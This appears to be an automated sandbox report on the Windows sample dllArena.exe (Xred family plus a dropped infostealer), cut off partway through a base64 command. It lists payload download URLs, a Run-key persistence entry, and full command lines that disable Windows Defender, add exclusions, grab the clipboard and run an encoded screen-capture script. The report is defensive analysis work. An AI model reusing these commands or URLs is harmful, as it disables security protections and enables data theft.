Analysis
-
max time kernel
143s -
max time network
148s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
18-11-2024 08:23
Behavioral task
behavioral1
Sample
dllArena.exe
Resource
win11-20241007-en
General
-
Target
dllArena.exe
-
Size
8.4MB
-
MD5
b8849b60e1823b0cb7368b56a61c7743
-
SHA1
caa74767470173e44edc33dea3e604fe2620a720
-
SHA256
fd59a4887d5b72ae931bc2c8d3e95a0bd856fbf1c3922331ef00a98ff77dfb9e
-
SHA512
121a100f36184d885517153d94da3bf95a7fc96ea95d12f58addfd7847c9697ea80641316efcfda102ef49170aecb4075cc3dad24b213f3d326eabd13d09e6dd
-
SSDEEP
196608:2LvgQdj4O9LgRRHG94UEbrURbsvnEJlQ9BWg:2LdX2RRmqUEbwRbsvnIG9BWg
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
Xred family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2868 powershell.exe 4812 powershell.exe 2020 powershell.exe 232 powershell.exe 3100 powershell.exe 4940 powershell.exe 2816 powershell.exe 3856 powershell.exe 3952 powershell.exe 1640 powershell.exe 3200 powershell.exe 3844 powershell.exe -
Clipboard Data 1 TTPs 6 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2408 cmd.exe 3500 powershell.exe 3292 cmd.exe 1956 powershell.exe 2572 cmd.exe 4488 powershell.exe -
Executes dropped EXE 17 IoCs
pid Process 2008 ._cache_dllArena.exe 4872 Synaptics.exe 3428 ._cache_Synaptics.exe 4068 Built.exe 3940 dllArena.exe 2964 Built.exe 4160 Built.exe 4440 dllArena.exe 2984 Built.exe 1572 rar.exe 1768 dllArena.exe 664 Built.exe 3704 Built.exe 1372 rar.exe 1332 Built.exe 1548 Built.exe 1204 rar.exe -
Loads dropped DLL 64 IoCs
pid Process 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2964 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 2984 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 3704 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe 1548 Built.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" dllArena.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 ip-api.com 5 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 9 IoCs
pid Process 3096 tasklist.exe 3672 tasklist.exe 1508 tasklist.exe 3076 tasklist.exe 2576 tasklist.exe 2916 tasklist.exe 1916 tasklist.exe 4620 tasklist.exe 4452 tasklist.exe -
resource yara_rule behavioral1/files/0x001900000002ab3c-240.dat upx behavioral1/memory/2964-244-0x00007FFAE58E0000-0x00007FFAE5EC8000-memory.dmp upx behavioral1/files/0x001900000002ab3a-249.dat upx behavioral1/memory/2964-267-0x00007FFAFC8F0000-0x00007FFAFC914000-memory.dmp upx behavioral1/files/0x001900000002ab36-266.dat upx behavioral1/memory/2964-268-0x00007FFAFC8E0000-0x00007FFAFC8EF000-memory.dmp upx behavioral1/files/0x001900000002ab35-265.dat upx behavioral1/files/0x001900000002ab34-264.dat upx behavioral1/files/0x001900000002ab33-263.dat upx behavioral1/files/0x001900000002ab32-262.dat upx behavioral1/files/0x001900000002ab31-261.dat upx behavioral1/files/0x001900000002ab30-260.dat upx behavioral1/files/0x001900000002ab2e-259.dat upx behavioral1/files/0x001900000002ab42-258.dat upx behavioral1/files/0x001900000002ab41-257.dat upx behavioral1/memory/2964-278-0x00007FFAF9750000-0x00007FFAF9773000-memory.dmp upx behavioral1/memory/2964-276-0x00007FFAF9860000-0x00007FFAF9879000-memory.dmp upx behavioral1/memory/2964-274-0x00007FFAF9B10000-0x00007FFAF9B3D000-memory.dmp upx behavioral1/files/0x001900000002ab3f-255.dat upx behavioral1/files/0x001900000002ab3b-252.dat upx behavioral1/files/0x001900000002ab39-251.dat upx behavioral1/files/0x001900000002ab2f-248.dat upx behavioral1/memory/2964-286-0x00007FFAF6510000-0x00007FFAF653E000-memory.dmp upx behavioral1/memory/2964-290-0x00007FFAE4620000-0x00007FFAE46D8000-memory.dmp upx behavioral1/memory/2964-291-0x00007FFAE58E0000-0x00007FFAE5EC8000-memory.dmp upx behavioral1/memory/2964-300-0x00007FFAE17A0000-0x00007FFAE18BC000-memory.dmp upx behavioral1/memory/2964-296-0x00007FFAF9A10000-0x00007FFAF9A1D000-memory.dmp upx behavioral1/memory/2964-295-0x00007FFAF9490000-0x00007FFAF94A4000-memory.dmp upx behavioral1/memory/2964-294-0x00007FFAFC8F0000-0x00007FFAFC914000-memory.dmp upx behavioral1/memory/2964-289-0x00007FFAE18C0000-0x00007FFAE1C35000-memory.dmp upx behavioral1/memory/2964-285-0x00007FFAF9CC0000-0x00007FFAF9CCD000-memory.dmp upx behavioral1/memory/2964-284-0x00007FFAF9840000-0x00007FFAF9859000-memory.dmp upx behavioral1/memory/2964-280-0x00007FFAE5160000-0x00007FFAE52D3000-memory.dmp upx behavioral1/memory/2984-335-0x00007FFAE76B0000-0x00007FFAE7C98000-memory.dmp upx behavioral1/memory/2964-334-0x00007FFAF9750000-0x00007FFAF9773000-memory.dmp upx behavioral1/memory/2964-345-0x00007FFAF6510000-0x00007FFAF653E000-memory.dmp upx behavioral1/memory/2964-344-0x00007FFAF9840000-0x00007FFAF9859000-memory.dmp upx behavioral1/memory/2984-343-0x00007FFAF8EF0000-0x00007FFAF8EFF000-memory.dmp upx behavioral1/memory/2984-342-0x00007FFAF8F00000-0x00007FFAF8F24000-memory.dmp upx behavioral1/memory/2964-341-0x00007FFAE5160000-0x00007FFAE52D3000-memory.dmp upx behavioral1/memory/2984-444-0x00007FFAE6020000-0x00007FFAE604D000-memory.dmp upx behavioral1/memory/2984-447-0x00007FFAE1CF0000-0x00007FFAE1E63000-memory.dmp upx behavioral1/memory/2984-446-0x00007FFAE5FF0000-0x00007FFAE6013000-memory.dmp upx behavioral1/memory/2984-445-0x00007FFAEDF00000-0x00007FFAEDF19000-memory.dmp upx behavioral1/memory/2964-443-0x00007FFAE4620000-0x00007FFAE46D8000-memory.dmp upx behavioral1/memory/2984-448-0x00007FFAEDE80000-0x00007FFAEDE99000-memory.dmp upx behavioral1/memory/2984-463-0x00007FFAF8F00000-0x00007FFAF8F24000-memory.dmp upx behavioral1/memory/2984-462-0x00007FFADBA80000-0x00007FFADBDF5000-memory.dmp upx behavioral1/memory/2984-465-0x00007FFAF8AC0000-0x00007FFAF8ACD000-memory.dmp upx behavioral1/memory/2984-478-0x00007FFAE5EE0000-0x00007FFAE5EF4000-memory.dmp upx behavioral1/memory/2984-485-0x00007FFAEDF00000-0x00007FFAEDF19000-memory.dmp upx behavioral1/memory/2984-484-0x00007FFAE6020000-0x00007FFAE604D000-memory.dmp upx behavioral1/memory/2984-483-0x00007FFAF8EF0000-0x00007FFAF8EFF000-memory.dmp upx behavioral1/memory/2984-482-0x00007FFAF8F00000-0x00007FFAF8F24000-memory.dmp upx behavioral1/memory/2984-481-0x00007FFADBA80000-0x00007FFADBDF5000-memory.dmp upx behavioral1/memory/2984-476-0x00007FFAE5F00000-0x00007FFAE5FB8000-memory.dmp upx behavioral1/memory/2984-472-0x00007FFAE1CF0000-0x00007FFAE1E63000-memory.dmp upx behavioral1/memory/2984-474-0x00007FFAF8C20000-0x00007FFAF8C2D000-memory.dmp upx behavioral1/memory/2984-473-0x00007FFAEDE80000-0x00007FFAEDE99000-memory.dmp upx behavioral1/memory/2984-466-0x00007FFAE76B0000-0x00007FFAE7C98000-memory.dmp upx behavioral1/memory/2984-480-0x00007FFAE5FC0000-0x00007FFAE5FEE000-memory.dmp upx behavioral1/memory/2984-479-0x00007FFAF8AC0000-0x00007FFAF8ACD000-memory.dmp upx behavioral1/memory/2984-471-0x00007FFAE5FF0000-0x00007FFAE6013000-memory.dmp upx behavioral1/memory/2984-464-0x00007FFAE5EE0000-0x00007FFAE5EF4000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllArena.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 844 WMIC.exe 3104 WMIC.exe 3948 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.
pid Process 4368 systeminfo.exe 4404 systeminfo.exe 4496 systeminfo.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ dllArena.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4712 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 1640 powershell.exe 1640 powershell.exe 4940 powershell.exe 4940 powershell.exe 2868 powershell.exe 2868 powershell.exe 3500 powershell.exe 3500 powershell.exe 32 powershell.exe 32 powershell.exe 32 powershell.exe 4940 powershell.exe 3500 powershell.exe 1640 powershell.exe 2868 powershell.exe 3200 powershell.exe 3200 powershell.exe 2620 powershell.exe 2620 powershell.exe 4812 powershell.exe 3844 powershell.exe 2020 powershell.exe 4812 powershell.exe 3844 powershell.exe 3844 powershell.exe 2020 powershell.exe 2020 powershell.exe 1956 powershell.exe 1956 powershell.exe 4168 powershell.exe 4168 powershell.exe 1956 powershell.exe 4168 powershell.exe 2816 powershell.exe 2816 powershell.exe 3924 powershell.exe 3924 powershell.exe 3856 powershell.exe 232 powershell.exe 3856 powershell.exe 3100 powershell.exe 232 powershell.exe 3100 powershell.exe 3100 powershell.exe 4488 powershell.exe 4488 powershell.exe 1532 powershell.exe 1532 powershell.exe 4488 powershell.exe 1532 powershell.exe 3952 powershell.exe 3952 powershell.exe 3108 powershell.exe 3108 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1916 tasklist.exe Token: SeDebugPrivilege 1508 tasklist.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeDebugPrivilege 2868 powershell.exe Token: SeIncreaseQuotaPrivilege 2896 WMIC.exe Token: SeSecurityPrivilege 2896 WMIC.exe Token: SeTakeOwnershipPrivilege 2896 WMIC.exe Token: SeLoadDriverPrivilege 2896 WMIC.exe Token: SeSystemProfilePrivilege 2896 WMIC.exe Token: SeSystemtimePrivilege 2896 WMIC.exe Token: SeProfSingleProcessPrivilege 2896 WMIC.exe Token: SeIncBasePriorityPrivilege 2896 WMIC.exe Token: SeCreatePagefilePrivilege 2896 WMIC.exe Token: SeBackupPrivilege 2896 WMIC.exe Token: SeRestorePrivilege 2896 WMIC.exe Token: SeShutdownPrivilege 2896 WMIC.exe Token: SeDebugPrivilege 2896 WMIC.exe Token: SeSystemEnvironmentPrivilege 2896 WMIC.exe Token: SeRemoteShutdownPrivilege 2896 WMIC.exe Token: SeUndockPrivilege 2896 WMIC.exe Token: SeManageVolumePrivilege 2896 WMIC.exe Token: 33 2896 WMIC.exe Token: 34 2896 WMIC.exe Token: 35 2896 WMIC.exe Token: 36 2896 WMIC.exe Token: SeDebugPrivilege 4620 tasklist.exe Token: SeDebugPrivilege 3500 powershell.exe Token: SeIncreaseQuotaPrivilege 2896 WMIC.exe Token: SeSecurityPrivilege 2896 WMIC.exe Token: SeTakeOwnershipPrivilege 2896 WMIC.exe Token: SeLoadDriverPrivilege 2896 WMIC.exe Token: SeSystemProfilePrivilege 2896 WMIC.exe Token: SeSystemtimePrivilege 2896 WMIC.exe Token: SeProfSingleProcessPrivilege 2896 WMIC.exe Token: SeIncBasePriorityPrivilege 2896 WMIC.exe Token: SeCreatePagefilePrivilege 2896 WMIC.exe Token: SeBackupPrivilege 2896 WMIC.exe Token: SeRestorePrivilege 2896 WMIC.exe Token: SeShutdownPrivilege 2896 WMIC.exe Token: SeDebugPrivilege 2896 WMIC.exe Token: SeSystemEnvironmentPrivilege 2896 WMIC.exe Token: SeRemoteShutdownPrivilege 2896 WMIC.exe Token: SeUndockPrivilege 2896 WMIC.exe Token: SeManageVolumePrivilege 2896 WMIC.exe Token: 33 2896 WMIC.exe Token: 34 2896 WMIC.exe Token: 35 2896 WMIC.exe Token: 36 2896 WMIC.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeIncreaseQuotaPrivilege 868 WMIC.exe Token: SeSecurityPrivilege 868 WMIC.exe Token: SeTakeOwnershipPrivilege 868 WMIC.exe Token: SeLoadDriverPrivilege 868 WMIC.exe Token: SeSystemProfilePrivilege 868 WMIC.exe Token: SeSystemtimePrivilege 868 WMIC.exe Token: SeProfSingleProcessPrivilege 868 WMIC.exe Token: SeIncBasePriorityPrivilege 868 WMIC.exe Token: SeCreatePagefilePrivilege 868 WMIC.exe Token: SeBackupPrivilege 868 WMIC.exe Token: SeRestorePrivilege 868 WMIC.exe Token: SeShutdownPrivilege 868 WMIC.exe Token: SeDebugPrivilege 868 WMIC.exe Token: SeSystemEnvironmentPrivilege 868 WMIC.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4712 EXCEL.EXE 4712 EXCEL.EXE 4712 EXCEL.EXE 4712 EXCEL.EXE 4712 EXCEL.EXE 4712 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3400 wrote to memory of 2008 3400 dllArena.exe 79 PID 3400 wrote to memory of 2008 3400 dllArena.exe 79 PID 3400 wrote to memory of 4872 3400 dllArena.exe 81 PID 3400 wrote to memory of 4872 3400 dllArena.exe 81 PID 3400 wrote to memory of 4872 3400 dllArena.exe 81 PID 4872 wrote to memory of 3428 4872 Synaptics.exe 82 PID 4872 wrote to memory of 3428 4872 Synaptics.exe 82 PID 2008 wrote to memory of 4068 2008 ._cache_dllArena.exe 84 PID 2008 wrote to memory of 4068 2008 ._cache_dllArena.exe 84 PID 2008 wrote to memory of 3940 2008 ._cache_dllArena.exe 85 PID 2008 wrote to memory of 3940 2008 ._cache_dllArena.exe 85 PID 4068 wrote to memory of 2964 4068 Built.exe 86 PID 4068 wrote to memory of 2964 4068 Built.exe 86 PID 2964 wrote to memory of 2852 2964 Built.exe 88 PID 2964 wrote to memory of 2852 2964 Built.exe 88 PID 2964 wrote to memory of 900 2964 Built.exe 89 PID 2964 wrote to memory of 900 2964 Built.exe 89 PID 2964 wrote to memory of 1332 2964 Built.exe 90 PID 2964 wrote to memory of 1332 2964 Built.exe 90 PID 2964 wrote to memory of 3008 2964 Built.exe 94 PID 2964 wrote to memory of 3008 2964 Built.exe 94 PID 2964 wrote to memory of 1156 2964 Built.exe 96 PID 2964 wrote to memory of 1156 2964 Built.exe 96 PID 3428 wrote to memory of 4160 3428 ._cache_Synaptics.exe 98 PID 3428 wrote to memory of 4160 3428 ._cache_Synaptics.exe 98 PID 3428 wrote to memory of 4440 3428 ._cache_Synaptics.exe 99 PID 3428 wrote to memory of 4440 3428 ._cache_Synaptics.exe 99 PID 2964 wrote to memory of 4592 2964 Built.exe 100 PID 2964 wrote to memory of 4592 2964 Built.exe 100 PID 2964 wrote to memory of 2408 2964 Built.exe 101 PID 2964 wrote to memory of 2408 2964 Built.exe 101 PID 3008 wrote to memory of 1916 3008 cmd.exe 103 PID 3008 wrote to memory of 1916 3008 cmd.exe 103 PID 4160 wrote to memory of 2984 4160 Built.exe 137 PID 4160 wrote to memory of 2984 4160 Built.exe 137 PID 2964 wrote to memory of 2952 2964 Built.exe 105 PID 2964 wrote to memory of 2952 2964 Built.exe 105 PID 1156 wrote to memory of 1508 1156 cmd.exe 108 PID 1156 wrote to memory of 1508 1156 cmd.exe 108 PID 2852 wrote to memory of 2868 2852 cmd.exe 109 PID 2852 wrote to memory of 2868 2852 cmd.exe 109 PID 2964 wrote to memory of 2640 2964 Built.exe 110 PID 2964 wrote to memory of 2640 2964 Built.exe 110 PID 1332 wrote to memory of 4940 1332 cmd.exe 111 PID 1332 wrote to memory of 4940 1332 cmd.exe 111 PID 900 wrote to memory of 1640 900 cmd.exe 113 PID 900 wrote to memory of 1640 900 cmd.exe 113 PID 2964 wrote to memory of 2712 2964 Built.exe 114 PID 2964 wrote to memory of 2712 2964 Built.exe 114 PID 2964 wrote to memory of 4024 2964 Built.exe 116 PID 2964 wrote to memory of 4024 2964 Built.exe 116 PID 4592 wrote to memory of 2896 4592 cmd.exe 144 PID 4592 wrote to memory of 2896 4592 cmd.exe 144 PID 2952 wrote to memory of 4620 2952 cmd.exe 119 PID 2952 wrote to memory of 4620 2952 cmd.exe 119 PID 2408 wrote to memory of 3500 2408 cmd.exe 120 PID 2408 wrote to memory of 3500 2408 cmd.exe 120 PID 2640 wrote to memory of 2924 2640 cmd.exe 121 PID 2640 wrote to memory of 2924 2640 cmd.exe 121 PID 4024 wrote to memory of 32 4024 cmd.exe 122 PID 4024 wrote to memory of 32 4024 cmd.exe 122 PID 2712 wrote to memory of 4368 2712 cmd.exe 123 PID 2712 wrote to memory of 4368 2712 cmd.exe 123 PID 2964 wrote to memory of 1400 2964 Built.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\dllArena.exe"C:\Users\Admin\AppData\Local\Temp\dllArena.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Users\Admin\AppData\Local\Temp\._cache_dllArena.exe"C:\Users\Admin\AppData\Local\Temp\._cache_dllArena.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"5⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"5⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\system32\tree.comtree /A /F6⤵PID:2924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANA